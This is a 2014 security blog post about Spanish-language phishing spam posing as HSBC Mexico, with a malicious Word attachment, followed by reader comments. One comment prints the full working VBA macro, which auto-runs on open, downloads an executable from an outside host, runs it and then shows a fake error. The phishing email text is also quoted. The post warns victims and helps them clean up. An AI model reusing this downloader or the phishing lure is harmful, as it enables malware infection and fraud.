Sponsored by..

Thursday, 17 July 2014

"Notificación de transferencia de fondos a su favor" spam

This Spanish-language spam has a malicious Word document as an attachment.

From:     HSBC Transferencias [Mexico_contacto@hsbc.com.mx]
Reply-To:     respuesta@hsbc.com.mx
Date:     17 July 2014 11:01

¡BIENVENIDO A HSBC!

El motivo de este correo es informarle que el día de hoy recibió una transferencia SPEI la cual se encuentra retenida debido a anomalías en su cuenta. Para mas detalles sobre esta situación le adjuntamos un documento en formato Microsoft Word donde explicamos el motivo de la retención y los pasos a seguir.



Banco emisor: BBVA BANCOMER
Importe: $94,000.00
Fecha: 17/07/2014
Folio: 89413


Estatus: Retenida
Recomendamos seguir los pasos descritos en el documento adjunto en este correo.


Para cualquier duda o aclaración  nos ponemos a sus órdenes en contacto@hsbc.com.mx o si lo prefiere,  puede comunicarse a Banca por Internet en los siguientes teléfonos:
     México D.F. (55) 5721 1635
     Desde cualquier estado de la República al 01800 4722 638 LADA sin costo.

Con gusto le atenderemos

The attachment is essentially the same as the one mentioned here which tries to lure the victim into removing their Word security settings so that a malicious macro can run.

The VirusTotal detection rate is a pretty poor 4/54. You can see some of the text strings in the Malwr report which feature a reverse URL of exe.ss/pw/arc/lc.paip//:ptth which is reverse to try to download a file from http://piap.cl/cra/wp/ss.exe (currently 404ing). The VBA in the document can be found here [pastebin].

As mentioned before, this is a long-running campaign apparently targeting users in Mexico, and as yet I have not seen this in any language except Spanish.

8 comments:

Cosas extrañamente normales said...
This comment has been removed by the author.
Cosas extrañamente normales said...

Thank you so much, I received this same email yesterday, had no idea what to do until I saw the properties and saw the "modified by "clein"", so I started looking for that name and found your blog. My sister opened the document and activated the macros yesterday, I don't know what to do, the pc isn't behaving suspiciously at all. What should I do? Greetings from México

edit: When my sister opened the document it said the isn't compatible with my pc. Also, she said it didn't dowloaded anythin after opening.

Ulises Pérez said...

Hola como se que no estoy contagiado con algun virus yo lo abri tambien por accidente

Cesar Alejandro Amezcua Tejeda said...

Este es el código que se ejecuta tengan cuidado, VBA, como dice el post te descarga archivos a tu equipo

Private Sub Auto_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "4b646n46.exe")
End Sub
Private Sub Workbook_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "rsd54tgs.exe")
End Sub
Private Sub AutoExec()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "ds8fydsa89f7.exe")
End Sub
Private Sub AutoOpen()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "fsfsfsdsd.exe")
End Sub
Private Sub Document_Open()
Call DownloadFile(StrReverse("exe.ss/pw/arc/lc.paip//:ptth"), "hjhhjhjhjhj.exe")
End Sub
Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
On Error Resume Next
Err.Clear

Set XML = CreateObject("Microsoft.XMLHTTP")
Set ADS = CreateObject("ADODB.Stream")

XML.Open "GET", URL, False
XML.send

XML.getAllResponseHeaders

FullSavePath = Environ(SavePath) & "\" & SaveName

ADS.Open
ADS.Type = 1
ADS.Write XML.responseBody
ADS.SaveToFile FullSavePath, 2

Shell FullSavePath, vbNormalFocus
DownloadFile = True
MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
Dim z
z = 0
Do While 1 = 1
If z = 2 Then
Application.DisplayAlerts = False
Application.Quit
End If
z = z + 1
Loop
End Function

Cesar Alejandro Amezcua Tejeda said...

Posiblemente por lo que entiendo se descarga en la carpeta Temp en mi caso es

C:\Users\[usuario]\AppData\Local\Temp

Sería buscar en esa carpeta los archivos

4b646n46.exe
rsd54tgs.exe
ds8fydsa89f7.exe
fsfsfsdsd.exe
hjhhjhjhjhj.exe

y si es así eliminarlos y aplicar un escaneo al equipo.

Cesar Alejandro Amezcua Tejeda said...
This comment has been removed by the author.
Conrad Longmore said...

@Cosas extrañamente normales: I think opening it is harmless unless you have disabled the Macro security.

Cosas extrañamente normales said...

@Conrad Longmore I looks like the macro security was disabled. Just noted my pc opens IE on startup. I did what Cesar Alejandro Amezcua Tejeda said.

btw

Gracias @Cesar Alejandro Amezcua Tejeda, en caso de encontrar algo más en el escaneo lo escribiré por aquí. (In any case I find something else in the scan, I'll put it here)